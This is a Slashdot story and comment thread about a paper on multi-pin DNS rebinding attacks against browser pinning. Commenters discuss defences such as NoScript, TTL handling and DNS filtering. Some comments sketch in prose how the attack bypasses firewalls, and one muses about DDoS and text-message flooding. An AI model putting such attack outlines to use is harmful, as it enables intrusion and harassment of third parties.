Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

DNS Rebinding Attacks, Multi-Pin Variant

CmdrTaco posted more than 7 years ago | from the i-feel-safer-already dept.

Security 84

Morty writes "DNS rebinding attacks can be used by hostile websites to get browsers to attack behind firewalls, or to attack third parties. Browsers use "pinning" to prevent this, but a paper describes so-called multi-pin vulnerabilities that bypass the existing protections. Note that, from a DNS perspective, this is a "feature" rather than an implementation bug, although it's possible that DNS servers could be modified to prevent external sources from being able to point at internal resources."

Sorry! There are no comments related to the filter you selected.

Fox? (0, Flamebait)

StarvingSE (875139) | more than 7 years ago | (#20136005)

Is this a new FOX special?

That is some cool shit... (0)

Anonymous Coward | more than 7 years ago | (#20136115)

... especially where you can frame someone.

I've got to go, ummm, code up a few things.

ah (0)

Anonymous Coward | more than 7 years ago | (#20136161)

it says that it would take 1 second for this to work on firefox and 4 seconds on opera [w/out plugins] although they found a way to fix firefox 2 with a 72-line patch.

NoScript (0)

Anonymous Coward | more than 7 years ago | (#20136175)

Once again, NoScript blocks access to yet another crazy vulnerability.

It may be a pain to use at times, but it sure blocks out a lot of crap. I had to temporarily disable it to get their vulnerability checker to work.

We are now checking your browser... (3, Insightful)

bugnuts (94678) | more than 7 years ago | (#20136201)

We are now checking your browser for DNS rebinding vulnerabilities.
Not without Javascript you aren't!

But it's true, most people loooove that javascript. I can't stand it, myself, and only enable it when I absolutely have to.

Ask Slashdot: Pause a running Javascript (1)

G4from128k (686170) | more than 7 years ago | (#20136345)

Does anyone know of a way to pause/restart someone else's running Javascript (in Firefox or Safari?) without reloading the page. I mostly browse with JS off, but occasionally turn it on for one site or another. But I'd like to be able to stop/pause JS after it starts (e.g., to pause an CPU-sucking JS animation loop or halt JS on a site where I unintentionally had JS on).

Any ideas? Thanks.

Re:Ask Slashdot: Pause a running Javascript (1, Informative)

Anonymous Coward | more than 7 years ago | (#20136529)

http://www.getfirebug.com/ [getfirebug.com]

Re:Ask Slashdot: Pause a running Javascript (1)

Random832 (694525) | more than 7 years ago | (#20141889)

And how do you pause a running script without knowing where to set a breakpoint - or for that matter how do you pause a timer (setInterval) at all?

Re:Ask Slashdot: Pause a running Javascript (3, Funny)

captnitro (160231) | more than 7 years ago | (#20136631)

CPU-sucking JS animation loop.. Any ideas?


You should probably consider upgrading from a 486.

Re:Ask Slashdot: Pause a running Javascript (2, Insightful)

Sigma 7 (266129) | more than 7 years ago | (#20137325)

You should probably consider upgrading from a 486.
Won't protect against the buggy Javascript in question.

As an example, let's assume that one of those shaky "Your the 999,999th visitor" ads pins the CPU at 100%. Unless you only one web browser window/tab open (if you read /., probably not), it will be running more than once and thus cause problems. Even one 100% CPU process or thread can lock down the system - especially if it's called "Spoolsv.exe".

Dual core systems could help... but it won't be long before an SMP process can do the 100% pinning as well.

P.S. If you hear whooshing, you probably want to wear eye/head protection.

Re:Ask Slashdot: Pause a running Javascript (1)

Kwiik (655591) | more than 7 years ago | (#20144323)

we repeat:
You should probably consider upgrading from a 486.

Re:Ask Slashdot: Pause a running Javascript (0)

Anonymous Coward | more than 7 years ago | (#20146063)

Yes, modern processors are so much faster at executing infinite loops.

Re:Ask Slashdot: Pause a running Javascript (1)

Sigma 7 (266129) | more than 7 years ago | (#20159397)

we repeat:
You should probably consider upgrading from a 486.
The processors capable of handling an infinite number of operations in finite time haven't been invented yet. But once that happens, we'll be able to have infinite-precision calculators.

Re:Ask Slashdot: Pause a running Javascript (1)

Kwiik (655591) | more than 7 years ago | (#20163607)

The point is that a faster processor, regardless of if it's multi-core, gives the OS a much better opportunity to arrange for multitasking with other processes of the same priority.

I really hope nobody is scheduling javascript applications above the default priority.

OTOH, can't a plausible fix for this be to have web browsers run all scripted functions within a lower priority thread?

Re:Ask Slashdot: Pause a running Javascript (2, Interesting)

cheater512 (783349) | more than 7 years ago | (#20137391)

Firefox should kill any bad javascript automatically.
If it hogs cpu then it will wait for a period of time then ask you what to do with it.

Re:Ask Slashdot: Pause a running Javascript (1)

empaler (130732) | more than 7 years ago | (#20140297)

Know where to tweak the time setting for this?

In about:config (3, Informative)

Ayanami Rei (621112) | more than 7 years ago | (#20140687)

Change dom.max_script_run_time to a smaller (or larger) number of seconds.

Re:In about:config (1)

empaler (130732) | more than 7 years ago | (#20146311)

TY :)

(sometimes it does pay off not googling stuff)

Re:We are now checking your browser... (1, Informative)

Anonymous Coward | more than 7 years ago | (#20136533)

Not without Javascript you aren't!

The article mentions Java and Flash are problems as well.

Re:We are now checking your browser... (5, Informative)

grcumb (781340) | more than 7 years ago | (#20136573)

We are now checking your browser for DNS rebinding vulnerabilities.
Not without Javascript you aren't!

Heh, my boy, you just summed up the Web's great affliction in a nutshell.

This particular exploit vector is especially troublesome because turning off the ability to point a name at multiple IPs would break a large part of the Internet. But it wouldn't be an issue for web browsers if we didn't see the need for the Web to be dynamic and interactive. Dynamism and interactivity are really not built into HTTP. It would be more accurate to say that HTTP was designed to be just the opposite.

Website designers and software makers have been trying to turn the Web into a collection of desktop applications since about the time the Web was invented. This runs counter to what Tim Berners Lee intended. HTTP is stateless for a reason. I honestly don't think he made HTTP stateless because he envisioned the havoc that malicious websites could cause, but the principle of agnosticism (i.e. providing content without knowing anything about the requester's capabilities) that's implicit in the protocol is inherently more secure than the desire of many to make websites into remotely-accessed desktop apps.

Unfortunately, this particular horse bolted from the barn in the earliest days of the web, and there's no easy way to get it back in. A wise web developer will nonetheless read and understand the HTTP protocol. Its statelessness and agnosticism can be strengths when considered in the proper light....

...Yeesh, that last sentence makes me feel like Yoda counselling young Luke.... 8^/

Re:We are now checking your browser... (2, Interesting)

grcumb (781340) | more than 7 years ago | (#20136643)

Heh, I picked a fine day to start pontificating about what the web is for [google.com] ....

Happy birthday, Web. You're almost street legal now.... 8^)

Re:We are now checking your browser... (1)

fm6 (162816) | more than 7 years ago | (#20136757)

I honestly don't think he made HTTP stateless because he envisioned the havoc that malicious websites could cause, but the principle of agnosticism (i.e. providing content without knowing anything about the requester's capabilities) that's implicit in the protocol is inherently more secure than the desire of many to make websites into remotely-accessed desktop apps.
You make some good points. But I don't think it's pr4oductive to imagine what Sir Tim had in mind when he invented http. Like many Internet protocols, http was invented in an era where you just assumed that other users weren't malicious. Remember, this was when you could use any smtp server on the planet without supplying a password.

If you want to get religious about "what the web was meant for" then you have to reject not just dynamic content, but any web application that goes beyond Sir Tim's original concept of simple shared documents. But of course, people went beyond that from day one. Give geeks a new technology, and they'll hack around with it until they make it do all kinds of stuff that was never imagined by the original designers.

Maybe folks should not have kludged interactive application onto http. But I think it was inevitable. There was a huge demand for distributed applications, and the web was the only platform available. As you say, the horse has left the barn. Indeed, he's now surrounded by PETA types armed with tommy guns. We're not going to get him back.

Re:We are now checking your browser... (1)

larry bagina (561269) | more than 7 years ago | (#20137295)

the original 3 HTTP methods were GET, PUT, and DELETE. POST/cgi came later. PUT and DELETE are used today in WEBDAV but not as originally intended (think wiki).

Re:We are now checking your browser... (1)

grcumb (781340) | more than 7 years ago | (#20137935)

You make some good points. But I don't think it's pr4oductive [sic] to imagine what Sir Tim had in mind when he invented http.

Not necessarily productive in any immediate sense, but educative. It does help us understand the current shortcomings of HTTP and to understand as well why it's been hacked into the shape that it's taken these days. I really worry about the naive approaches some so-called Web 2.0 applications take, and wanted to reiterate that those who don't learn from history are condemned to repeat it.

If you want to get religious about "what the web was meant for" then you have to reject not just dynamic content, but any web application that goes beyond Sir Tim's original concept of simple shared documents. But of course, people went beyond that from day one.

Agreed. That's more or less what I was implying, though not nearly as clearly and succinctly. 8^)

Learning what HTTP was originally intended to do and contrasting that with what it became is a useful exercise as long as it's understood that there's no rolling back the clock.

The stateless, agnostic nature of HTTP (I almost said 'the Web', but that's no longer true...) can be used as a feature that enhances the security and the functionality of a website or other online resource, if it's properly understood. But as far as I can tell, the average online application designer today considers HTTP's stateless nature to be a bug rather than a feature.

the source of all internet stupidity (0)

Anonymous Coward | more than 7 years ago | (#20140681)

Like many Internet protocols, http was invented in an era where you just assumed that other users weren't malicious.

Have you ever seen a more naive assumption? Tim must have been about the dumbest person ever to be able to program a computer.

Re:the source of all internet stupidity (1)

mikael (484) | more than 7 years ago | (#20141355)

Have you ever seen a more naive assumption? Tim must have been about the dumbest person ever to be able to program a computer.

Back in that time, the only people using LAN technology were corporate, academic and military networks, since a network card cost something around one grand. The rest of the world had to make do with telnet sessions over dial-up modems or ISDN (paying per kilobyte).

In order for Windows NT to compete against UNIX, Microsoft took the TCP/IP protocol stack and bundled it with Windows NT and Windows 95 (as many developers had to write their own interfaces for their applications - both commercial applications and games). The introduction of other protocols such as SLIP and PPP allowed TCP/IP to run over modem lines, enabling ISP's including AOL to provided end user access.

Don't blame Tim, blame (or thank?) Microsoft. Microsoft could well have tried to invent their own proprietary protocol stack rather than choose to use TCP/IP or any of the other industry equivalents as seen on the Network Protocols Poster [man.ac.uk] )

Re:We are now checking your browser... (1)

Jeruvy (1045694) | more than 7 years ago | (#20184413)

I'm not buying any of this. Sure some SMTP servers were open, but not the smart ones. Granted the smart ones were pretty rare. As for dynamic content, this was taken into account, but not 'on-the-fly' dynamic content or 'user-generated' dynamic content were not considered. A Browser would allow one to browse, not alter or change. But it was simple enough to take the content and alter it, and repost it, even linking to the original one. However IP and ownership of the 'content' got in the way. We quickly realized we didn't want 'free' content, or content that anyone could change, so http morphed into a 'way to conduct business' rather than a document protocol. Back in 1991 we were learning about the potential for worms (Remember the Morris Worm!) so this 'era' was not so utopian as you claim. It was then we learned about the issues with DNS that today still hasn't been solved. Do you remember how many sites used to keep up posted with web defacements? It became a big thing in a very short order of time, by 1994 it was starting to get out of hand.

If you want to get religious about "what the web was meant for" then you have to reject not just dynamic content, but any web application that goes beyond Sir Tim's original concept of simple shared documents. But of course, people went beyond that from day one. Give geeks a new technology, and they'll hack around with it until they make it do all kinds of stuff that was never imagined by the original designers.

Maybe folks should not have kludged interactive application onto http. But I think it was inevitable. There was a huge demand for distributed applications, and the web was the only platform available. As you say, the horse has left the barn. Indeed, he's now surrounded by PETA types armed with tommy guns. We're not going to get him back.
No the problem was people didn't like articles being 'reformatted' for http, they found this annoying. Many though MS word format would be the document reader of choice so even word became a mini browser. On top of this many companies tried to pigeon-hole what the web or internet was going to be by dominating the traffic, Again this went contrary to researchers, but marketers were not going to be dissuaded from such common sense. Over time many idea's have died only to be reborn in java or ajax. Flash has become more than a simple animation tool to a completely interactive interface (with many issues of it's own). The real religious aspect of all this is the fact that many developers were not interested in this new direction of http, yet many ex-dotcommer's were more than eager to design a scheme that meant they offered more and better from their web pages. Today's world is testimonial to all that ignorance. Web Application Attacking is rampant! Way to go! We really need to create a true peer to peer client that can do all these wonderful things within a sandbox, so if something gets out of hand (buffer overflow, or directory traversal attempts, etc.) then it doesn't get out of the box.

Re:We are now checking your browser... (1)

fm6 (162816) | more than 7 years ago | (#20184731)

Sure some SMTP servers were open, but not the smart ones.
Dude, when I started using the internet in 1994, I was able to telnet into any SMTP server. Richard Stevens even used this fact in his book on TCP/IP, to demonstrate how SMTP worked.

Re:We are now checking your browser... (1)

Jeruvy (1045694) | more than 7 years ago | (#20223847)

Dude, The morris worm worked by exploiting SMTP, whats your point. The "smart" ones 'fixed' the problem'. It took the rest of the planet 10 years. Typical

Re:We are now checking your browser... (1)

fm6 (162816) | more than 7 years ago | (#20224689)

My point being that there was a time when people didn't feel a need to secure their SMTP servers.

Re:We are now checking your browser... (1)

Jeruvy (1045694) | more than 7 years ago | (#20242313)

Your point is lost now. Even today, is a time when people don't feel the need to secure their (insert term) servers, we call them zombies.

Re:We are now checking your browser... (1)

fm6 (162816) | more than 7 years ago | (#20242513)

Jeez, you're dense. I said that some Internet conventions date back to a period when people didn't worry about security; as an example I mentioned that people didn't even secure their smtp servers. You said "smart people always secured their servers." Which isn't true.

If you can't follow that argument, I'm certainly not going to try to parse it for you.

Re:We are now checking your browser... (1)

DrSkwid (118965) | more than 7 years ago | (#20140049)

> This runs counter to what Tim Berners Lee intended

He never thought of the Host: header either, perhaps we should go back to 1 IP per domain.

Re:We are now checking your browser... (1)

sootman (158191) | more than 7 years ago | (#20141799)

I can't resist: "Read the Source, Luke!"

Mods: don't waste points on this. :-)

Re:We are now checking your browser... (1)

kayditty (641006) | more than 7 years ago | (#20288665)

This doesn't require round robin DNS to work. The main proof of concept linked to by that page, actually, just creates a new A entry for unixtimestamp() . some_3_digit_value . domain.tld.

This entry points to the attacking webserver, and is given a very low TTL. Once DNS pinning is circumvented, the entry is changed. It doesn't have to have more than one A record.

Re:We are now checking your browser... (1)

wytcld (179112) | more than 7 years ago | (#20137445)

Um ... at the author's site:

We have detected that your browser is vulnerable to efficient DNS rebinding attacks.
Since I'm running Noscript, either the author of the paper is a liar (or his "test" is phoney), or else you're wrong when you say

Not without Javascript you aren't!
Guess I'll have to read the PDF.

The best defense: (0)

Anonymous Coward | more than 7 years ago | (#20136243)

No java, no javascript, no flash.

Everyone has to start using noscript.

Re:The best defense: (0)

Anonymous Coward | more than 7 years ago | (#20136411)

Awesome - no AJAX and we can stop hearing about "web 2.0".

Oh, wait - then Slashdot's new stuff won't work, Digg's stuff won't work and all that.

Re:The best defense: (0)

Anonymous Coward | more than 7 years ago | (#20136513)

Except Noscript has a per site/domain basis (I.E, slashdot.org only, not any other site within its pages). Handy, until the site you are currently whitelisting is compromised.

Re:The best defense: (1)

DrSkwid (118965) | more than 7 years ago | (#20140059)

Slashdot has javascript?
Can't say I've noticed any loss of functionality, but then I wouldn't, would I.
I run in LightHTML mode with Web Developer's "Disable Page Colours" enabled.

Black & White for me baby!

Sick and tired of javascript (0)

Anonymous Coward | more than 7 years ago | (#20136671)

Haven't we learned the lesson yet? I learned a decade ago and still sites unnecessarily rely on script for basic functionality.

There's nothing wrong with script, there is something very wrong when users cannot use a site without it. Something like noscript should be built into all browsers by default and bullshit like ASPs __doPostBack purged from the web.

Flashback (4, Insightful)

Spazmania (174582) | more than 7 years ago | (#20136747)

If you haven't read the article, I'll summarize it for you: its another critical vulnerability in java/javascript. The sandboxed script in the web browser alternately makes GET and POST requests the "same" server with each POST containing the contents of the prior GET... Only the IP address associated with the server's hostname keeps alternating between a server inside your firewall and the attacker's real server outside it. Oops.

At times like these, I tell a story about 1988 when I wrote a BBS terminal emulator for the Commodore 64 which cleverly allowed the BBS to send and run new code on the caller's machine. Another gentleman who didn't much like me noticed the feature and arranged for a number of BBS systems to execute the code at location 64738: system reset.

There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network. Either you trust the source of the program and let it do what it needs to do, or you don't trust it and don't allow it to run on your PC at all. How many of these vulnerabilities are we going to run through before we finally figure that out?

The folks at Sun might disagree with: (0)

Anonymous Coward | more than 7 years ago | (#20137071)

"There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network."

Re:Flashback (1)

Lux (49200) | more than 7 years ago | (#20137241)

> There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network. Either you trust the source of the program and let it do what it needs to do, or you don't trust it and don't allow it to run on your PC at all. How many of these vulnerabilities are we going to run through before we finally figure that out?

I'm not as much a pessimist as you are on this. The fact that so much of attackers' energy goes into circumventing the same origin policy speaks to the theoretical efficacy of the policy. The problem in this case is that the identity of the origin is security-critical, and defined in terms of DNS --a horribly insecure protocol.

If the "origin" the policy speaks to had some intransient relationship to where packets were actually being routed, then the issue in the article wouldn't be a problem. Combine that with solid implementations of the policy, and stop the proliferation of sandboxes that ALL have to be correct (perhaps by replacing Javascript, Java, Flash, ActiveX, et cetera with a unified client-side web programming standard) and browser sandboxing could work okay. A tall order, yes, but a feasible five-to-ten year scenario.

Then you'd still have to worry about XSS, but I think that's a separate problem from sandboxing.

Re:Flashback (2, Informative)

statusbar (314703) | more than 7 years ago | (#20138433)

One point placed in the paper:

Current versions of the JVM are not vulnerable to this attack because the Java security policy has been changed. Applets are now restricted to connecting to the IP address from which they were loaded.

if the web browser and applet are connecting to the server via a proxy, then neither the web browser nor the applet have control over "connecting to the same IP address from which they were loaded"

Therefore, if a proxy is involved then current versions of the JVM are still vulnerable.

Fortunately, the paper goes into detail about this later on:

Proxies. If a client uses an HTTP proxy to access the web, these mitigations do not prevent multi-pin attacks using Java applets. Clients using an HTTP proxy request web ob jects by URL, not by IP address.

The irony is that many organizations use proxies to implement both content and virus filtering. The use of these proxies themselves makes their web browsers MORE susceptible to these pinning attacks.

--jeffk++

So where's the beef? (1)

Apple Acolyte (517892) | more than 7 years ago | (#20136835)

Is this a real threat? If so, how severe is it and how much effort must be expended to fix it?

Re:So where's the beef? (1)

martin_henry (1032656) | more than 7 years ago | (#20136955)

Here. [google.com.au]

Re:So where's the beef? (0)

Anonymous Coward | more than 7 years ago | (#20137705)

Is this a real threat? If so, how severe is it and how much effort must be expended to fix it?

I could answer your questions, but you probably won't read it, since it would look like the article you seem unable to read.

pinning (1)

gronofer (838299) | more than 7 years ago | (#20136879)

What is "pinning" you may ask? From the linked pdf article, it's the caching of DNS lookups:

A common defense [for DNS rebinding attacks] implemented in several browsers is DNS pinning: once the browser resolves a host name to an IP address, the browser caches the result for a fixed duration, regardless of TTL.

But apparently this can be subverted with browser plug-ins, which have a separate "pin database".

Re:pinning (1)

Spazmania (174582) | more than 7 years ago | (#20141971)

it's the caching of DNS lookups

Specifically, its caching of DNS lookups IN VIOLATION OF the DNS protocol standard for TTL. This causes all manner of havoc when you change ISPs and need the old name/address mappings to quickly expire. I've seen Windows boxen continue to poll the old IP address for a web site weeks after the lookup with a 5-minute TTL was changed to the new IP address.

Pinning is bad bad bad and any application so poorly designed that it needs pinning to work securely is worse. If Javascript can't operate securely using DNS in the standard way, don't allow it to use DNS at all.

Wow. Really amazing... (4, Interesting)

mcrbids (148650) | more than 7 years ago | (#20136945)

Did you read the abstract?

It's well written, and has lots of examples of exactly how this vulnerability can be exploited. In short, I could probably sit down and in a single afternoon, write a set of scripts for a webserver and DNS server, post it on a $30/month "virtual host" server, and take out an ad for $100, and end up with a powerful DDOS attack on my host of choice.

All done in less than 24 hours.

Screw the "cyber-terrorists" in Russia, this is REALLY BIG, and is one of many REALLY BIG problems that can be exploited! And the fact that we're here, reading and posting here, is demonstration of the fact that the many vulnerabilities of the Internet are NOT being exploited to anything like their real potential...

So think about it: while we here at Slashdork might know as many as a dozen exploitable vulnerabilities like this one that would be nearly impossible to close, how many of us have actually DONE any of these?

And that, folks, is why security will NEVER be 100% technical, and there will always be a social mechanism involved - there really is an amazing amount of security in simply knowing that if you do, really bad stuff could really happen to you.

Not will happen, not even likely to happen. Just could happen is enough.

Besides, there's a funny paradox at work here: those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks. I'm tempted from time to time to make use of my skills in a bad way when I think about how easy it is for me to wreak havoc - but the risks of doing so have always stopped me far short. I enjoy my day job, since its nature is fundamentally altruistic. So I'm harmless.

As a case in point, I was chatting with my flight instructor and a staff member at the local FBO (an airport for small planes) and the staff member mentioned something about an annoying ex-boyfriend who kept calling her.

Without thinking, I mentioned the possibility of writing a quick script to send him 100,000 text messages that would say "Leave me the freak alone!". I imagined a two-line script that would take all of about 10 seconds to write, and I could use the hotspot at the FBO to do it.

100,000 isn't even a particularly big number for me - I routinely deal with datasets in the millions of records - so it didn't really occur to me right away what a blow that would be. But 100,000 times 5 cents adds up to $5,000 worth of text messages! And I'm sure that his cell company would limit the number of messages to be sent, but it's pretty certain that quite a few WOULD get through.

It was surprising to me what a staggering blow this would be. I was actually a bit embarrassed at having mentioned it.

Don't underestimate the power of social mechanisms to ensure our security!

Re: security through ... (0)

Anonymous Coward | more than 7 years ago | (#20137635)

there really is an amazing amount of security in simply knowing that if you do, really bad stuff could really happen to you.
In other words, you're advocating security through ... maturity? ;-)

Re:Wow. Really amazing... (1)

flonker (526111) | more than 7 years ago | (#20138645)

The really scary thing is, repinning to the local IP address, and then using the socket based vulnerabilities to port 135, allowing the attacker to bypass software (and hardware) firewalls, and fully compromise the victim. All for the cost of a single ad impression!

Re:Wow. Really amazing... (0)

Anonymous Coward | more than 7 years ago | (#20138747)

those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks.


OR

work for a variety of intelligence agencies/bureaus/etc. in a number of nations using such skills for nefarious purposes while getting paid quite well and being pretty damn well insulated against any repercussions deserved or undeserved.

Re:Wow. Really amazing... (1)

gronofer (838299) | more than 7 years ago | (#20138799)

Besides, there's a funny paradox at work here: those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks. I'm tempted from time to time to make use of my skills in a bad way when I think about how easy it is for me to wreak havoc - but the risks of doing so have always stopped me far short. I enjoy my day job, since its nature is fundamentally altruistic. So I'm harmless.
I don't have a day job, but still can't be bothered wreaking havoc. I suppose you need to have a particular enthusiasm for it.

Re:Wow. Really amazing... (1)

ShakaUVM (157947) | more than 7 years ago | (#20139487)

Yeah, when I was in college 10 years ago I discovered several ways of effectively shutting down the internet. The possibility of punishment wasn't there (our lab computers didn't require people to log in to use so there's no audit trail), but I still didn't do it since I am of the opinion that practical jokes should always be in good humor.

Re:Wow. Really amazing... (1)

neurovish (315867) | more than 7 years ago | (#20146683)

Perhaps I'm missing something critical here, but wouldn't the complexity of this attack make it largely un-useful. In order to switch the user's DNS back and forth between external and internal, you would need control of that user's DNS server, or at least a DNS server further up the chain. Beyond that, some knowledge of the internal network is required so the attacker knows where to go. Does the javascript exploit change the user's DNS server to something malicious?

In the event that everything lines up, this looks pretty effective, but there also seems to be many ways of getting the same results that are way easier.

Re:Wow. Really amazing... (1)

Morty (32057) | more than 7 years ago | (#20154183)

Perhaps I'm missing something critical here, but wouldn't the complexity of this attack make it largely un-useful. In order to switch the user's DNS back and forth between external and internal, you would need control of that user's DNS server, or at least a DNS server further up the chain.

RTFA. The attacker doesn't manipulate the user's DNS, the attacker manipulates his/her own DNS. The attacker uses records with low or 0 TTLs, so the user's DNS doesn't cache them as per spec. The trick is that the attacker changes his/her own DNS to point at the user's own names or addresses.

Beyond that, some knowledge of the internal network is required so the attacker knows where to go.

Yes. Which, for targetted attacks (think corporate espionage or hostile national governments) is not unrealistic.

Does the javascript exploit change the user's DNS server to something malicious?

RTFA. No; the attacker manipulates his/her own DNS, using a low TTL.

Seems they forgot a few things (3, Informative)

linuxkrn (635044) | more than 7 years ago | (#20137007)

I did RTFA, and it seems to me they made an oversight in the fact that most ISP/corp sites use a caching DNS server. A repeated lookup to the same domain will return the cached result. Their POC depends on the client doing another lookup and getting a different result. This would attack would depend on the client being able to the attacker's DNS.

Now they do say that the attacker DNS returns more then one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh to not get cached. And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP Qwest, has a bad habit of ignoring the TTL in my zone files.

example 1:

target lookup (T0) -> www.attacker.com
www.attacker.com -> 192.168.0.1

target lookup (T1) -> www.attacker.com
ISP/site cached reply -> 192.168.0.1 (attack failed)

Example 2:
target lookup (T0) -> www.attacker.com
www.attacker.com -> 192.168.0.1

target lookup (T1) -> www2.attacker.com
attacker's ISP cached reply -> 192.168.0.1 (attack failed again)

The only case I can see this working if the zone records contain an IP for some third party source that they want to try and abuse. So say www2.attacker.com points to 10.0.0.1 and that number is static in their zone record. Which appears to be much less efficient zombie scan with IP spoofing.

And finally, this is all dependent on the attacker tricking the client into loading Flash/Java/Javascript from their box. Another win for noscript.

Re:Seems they forgot a few things (1)

evought (709897) | more than 7 years ago | (#20137623)

[snip]
Now they do say that the attacker DNS returns more then one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh to not get cached. And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP Qwest, has a bad habit of ignoring the TTL in my zone files.
[snip]
Worse than that, they are assuming that the OS itself is not caching the result. I sometimes have to manually flush my cache (OS X) when playing with DNS records. OS X can't be the only system that caches lookups.

Re:Seems they forgot a few things (1)

Morty (32057) | more than 7 years ago | (#20137791)

Worse than that, they are assuming that the OS itself is not caching the result. I sometimes have to manually flush my cache (OS X) when playing with DNS records. OS X can't be the only system that caches lookups.
The article explicitly says that the attack assumes low or 0 TTLs. Your OS cache should not be caching 0 TTLs per RFC1034. Normally, you need to flush the cache because you are editing a record with a high(er) TTL, so your local cache legitimately retains the old version of the record. Some caches do ignore record TTLs, though.

- Morty

Re:Seems they forgot a few things (2, Informative)

afidel (530433) | more than 7 years ago | (#20138751)

Your OS cache should not be caching 0 TTLs per RFC1034

Meanwhile back in the real world both OSX and Windows DO ignore 0 TTL's as do many ISP's caching DNS servers. This is one of the things that makes round-robin DNS and ISP cutovers rather hard to plan in the real world. In fact I assume that some worst case ISP's will cache results for 48-72 hours despite a TTL of say 10 minutes.

Re:Seems they forgot a few things (1)

Morty (32057) | more than 7 years ago | (#20137747)

Now they do say that the attacker DNS returns more then one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh to not get cached.

DNS servers cache based on the resource record's TTL, not based on the zone's SOA's serial. The serial is used by secondaries.

And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP Qwest, has a bad habit of ignoring the TTL in my zone files.

The article assumes that third-party caches respect low and 0 TTLs. RFC1034 and RFC1035 say that a TTL of 0 should work. Many (most?) DNS caching servers obey the RFCs and respect low/0 TTLs. Changing this default would be a valid workaround for this problem, but would break legitimate use of low/0 TTLs (i.e. for high-availability solutions to do rapid failover.)

- Morty

Re:Seems they forgot a few things (2, Informative)

BitZtream (692029) | more than 7 years ago | (#20138191)

The zone serial number has nothing to do with this. DNS cache entries, be it on the host, or in caching DNS servers, or the clients primary DNS server are controlled by the TTL setting (Time to live). If you set the TTL to 0, you effectively disable caching across the internet for your domain. You may find some caching servers that won't honor a 0, but they're sure to expire the cache entry pretty quickly and they are few and far between.

Re:Seems they forgot a few things (2, Informative)

ACMENEWSLLC (940904) | more than 7 years ago | (#20142047)

It seems that it is a given that the host name must stay the same for this to work and that TTL must be very low, per TFA.

So if I modify my DNS cache server to ignor low TTL's and force a minimum TTL of 60 minutes, then I've defeated this issue. Of course, I've also broke external site's ability to do quick fail overs. But that can wait until a browser fix is out.

A browser fix could defeat this by maintaining DNS entries for a period of time. If the DNS changes to RFC1918 from non RFC1918, then prompt the user with a warning about the security issue involved and advise them to not allow the change.

This would not protect against this same attack going out against other sites on the web, though. A hacker could change the DNS to that of eBay and submit a bid through your computer, for example. Since DNS changing often with low TTL is normal, this seems like a complex issue to fully solve.

caching no problem : (2, Insightful)

DrSkwid (118965) | more than 7 years ago | (#20140081)

1) run your own nameserver
2) use a new subdomain for every request
3) ???
4) profit

Re:Seems they forgot a few things (1)

flonker (526111) | more than 7 years ago | (#20140835)

A host can have multiple A records, therefore you don't need to take advantage 0 TTL, you can just use the multiple A records to have the browser choose a random IP. You'll get a 50% success rate, but that's still pretty good.

Backup DNS Servers? (1)

Doc Ruby (173196) | more than 7 years ago | (#20137487)

Where can I find lists of DNS servers I can use instead of my cablemodem's default from my ISP? Servers that will let me point at them, that are fast and reliable.

I know one... (1)

woolio (927141) | more than 7 years ago | (#20137777)

Here's one that will* work for everyone: 127.0.0.1

*After you set up your own DNS server on the same computer.

Re:Backup DNS Servers? (2, Informative)

theGreater (596196) | more than 7 years ago | (#20138233)

OpenDNS ( http://www.opendns.com/ [opendns.com] ) works pretty well. I typically go internal cache, external ISP, openDNS on my systems. Keeps Windows boxes in line, especially.

-theGreater.

Re:Backup DNS Servers? (1)

Electrum (94638) | more than 7 years ago | (#20138277)

Where can I find lists of DNS servers I can use instead of my cablemodem's default from my ISP?

OpenDNS [opendns.com]

Re:Backup DNS Servers? (1)

pfleming (683342) | more than 7 years ago | (#20141869)

OpenDNS uses wildcarding that was despised when Network Solutions tried it. Granted, if all web servers had proper pointers it wouldn't be an issue since www.slashdot.org would be the same as slashdot.org. OpenDNS also breaks the "I Feel Lucky" lookup feature built into Firefox by removing Google from the loop. I tried it, I didn't like it. OpenDNS doesn't play well with my browsing habits. If I type domain.com instead of www.domain.com Firefox will attempt to lookup www.domain.com if domain.com doesn't have a pointer. Using OpenDNS, I end up on a search page for OpenDNS.

Re:Backup DNS Servers? (1)

Magic5Ball (188725) | more than 7 years ago | (#20138617)

4.2.2.1-4.2.2.6. Anycasted for speedy access.

Bind9 (0)

Anonymous Coward | more than 7 years ago | (#20137701)

The report mentions altering a corporate firewall\\\'s DNS server to refuse to return external results that contain internal IP addresses, but fails to mention how to do this.

Does anyone have a link to a tutorial outlining this for Bind 9?

Re:Bind9 (3, Informative)

Morty (32057) | more than 7 years ago | (#20137905)

For now, bind9 does not support this. See the relevant thread [google.com] .

There are far easier ways to exploit people (1)

BitZtream (692029) | more than 7 years ago | (#20138169)

There are plenty of other exploits that allow far greater control over all the IE users on the Internet than this. It still relies on the user going to a malicious website in the first place. If you can draw users to that web site, you might as well just fully exploit their browser and get some real code on the machine, then use it rather than bouncing crap around with javascript and constantly changing DNS entries.

And considering that I've already (after reading the article mind you) changed my DNS servers to not return results matching our internal address range for lookups resolved from external hosts, its ever less useful.

I'm glad they've brought this up, and its a hard one to really secure in modern browsers do to the cross-plugin problems, but its certainly not something that worries me. Not nearly as much as the users I have that click on the stupid 'You have a postcard from a neighbor' spams that always manage to get through our spam filters.

Re:There are far easier ways to exploit people (2, Informative)

Morty (32057) | more than 7 years ago | (#20138221)

It still relies on the user going to a malicious website in the first place.

